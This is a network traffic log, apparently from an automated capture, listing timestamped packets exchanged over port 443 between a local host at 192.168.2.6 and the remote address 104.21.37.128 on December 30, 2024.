Dec 30, 2024 18:15:27.719448090 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.719466925 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.762782097 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807380915 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807403088 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807457924 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807461977 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807482004 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807497978 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807498932 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807534933 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807540894 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807560921 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807564020 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807579041 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807584047 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807589054 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807624102 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807655096 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807902098 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807918072 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.807969093 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.807976007 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808022976 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.808155060 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808166981 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808222055 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.808228016 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808269978 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.808279037 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808294058 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808346987 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.808353901 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808403015 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.808485985 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808499098 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808546066 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.808552027 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.808590889 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.809027910 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.809139967 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.809154034 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.809212923 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.809218884 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.809257984 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.809329987 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.893034935 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.893058062 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.893116951 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.893125057 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.893173933 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.894427061 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.894442081 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.894483089 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.894488096 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.894510031 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.894526005 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.895711899 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895725965 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895776033 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.895781994 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895828962 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.895831108 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895842075 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895880938 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895886898 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.895898104 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895940065 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.895958900 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.895972013 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896017075 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.896023035 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896163940 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896183014 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896219969 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.896225929 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896256924 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.896467924 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896482944 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896517992 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.896524906 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896544933 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.896958113 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.896974087 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.897001982 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.897007942 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.897018909 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.950303078 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.980462074 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.980484009 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.980526924 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.980549097 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.980564117 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.980591059 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.980840921 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.980854988 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.980901957 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.980907917 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.980947971 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.982484102 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.982497931 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.982566118 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.982572079 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.982670069 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.982836008 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.982850075 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.982903004 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.982908964 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.982949018 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983164072 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983176947 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983247042 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983252048 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983292103 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983414888 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983443022 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983478069 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983484983 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983519077 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983534098 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983777046 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983791113 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983829021 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983833075 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.983861923 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.983880043 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.984323025 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.984335899 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.984380007 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.984385967 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:27.984412909 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:27.984431028 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.068093061 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.068119049 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.068177938 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.068207026 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.068234921 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.068260908 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.068496943 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.068515062 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.068562031 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.068573952 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.068610907 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070163012 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070180893 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070234060 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070244074 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070277929 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070482969 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070498943 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070555925 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070563078 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070605040 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070810080 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070832968 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070883036 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070889950 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.070907116 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.070935011 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071136951 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071155071 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071190119 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071197987 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071221113 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071244001 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071404934 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071422100 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071454048 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071468115 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071487904 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071506023 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.071927071 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071945906 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.071999073 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.072007895 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.072046995 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.156007051 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.156032085 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.156104088 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.156133890 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.156177998 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.157104969 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.157135963 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.157169104 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.157174110 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.157205105 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.157223940 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.161442995 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.161504984 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.209450960 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.209477901 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.209506989 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.209647894 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.209660053 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.209764004 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.249995947 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250071049 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250155926 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250188112 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250215054 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250228882 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250253916 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250284910 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250291109 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250323057 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250372887 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250384092 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250428915 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250435114 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250457048 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250698090 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250710011 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250742912 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.250749111 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.250776052 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.251154900 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251168013 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251215935 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.251223087 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251430035 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251441956 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251487970 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.251494884 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251516104 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.251852036 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251864910 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251908064 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.251915932 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.251938105 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.252147913 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.252160072 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.252202988 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.252207994 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.252229929 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.294101000 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.337357998 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337374926 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337516069 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.337518930 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337531090 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337567091 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337579012 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.337590933 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337616920 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.337631941 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.337841034 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337853909 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.337913990 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.543330908 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.590920925 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.803329945 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.803389072 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.965487957 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.965523958 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.965543032 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.965600014 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:28.965643883 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:28.965691090 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.064364910 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.064390898 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064404964 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064424992 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064472914 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.064481974 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064491987 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064572096 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064579010 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.064589977 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064619064 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064639091 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.064678907 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.064821005 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.271331072 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.271409988 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.535630941 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.535655022 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.535666943 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.535738945 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.535746098 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.535762072 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.535823107 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.535840988 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.535856962 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.535893917 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.616180897 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.616187096 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616199017 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616210938 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616266012 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.616271973 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616278887 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616411924 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.616419077 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616432905 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616451025 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.616617918 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.616691113 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.823338985 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.823426962 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.878235102 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.878241062 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.878523111 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.883241892 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.883245945 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.883253098 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.883269072 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.883294106 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.883553028 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.883558989 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.883574963 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.883723974 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.883838892 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.907483101 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.907486916 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.907510042 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.907666922 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911362886 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911365986 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911390066 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911411047 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911422968 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911442995 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911463022 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911632061 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911638021 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911652088 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911663055 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.911685944 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911782026 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911874056 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911977053 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.911977053 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.943702936 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.943708897 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.943721056 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.943866968 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.951193094 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:29.951198101 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.951214075 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:29.951230049 CET	443	49805	104.21.37.128	192.168.2.6
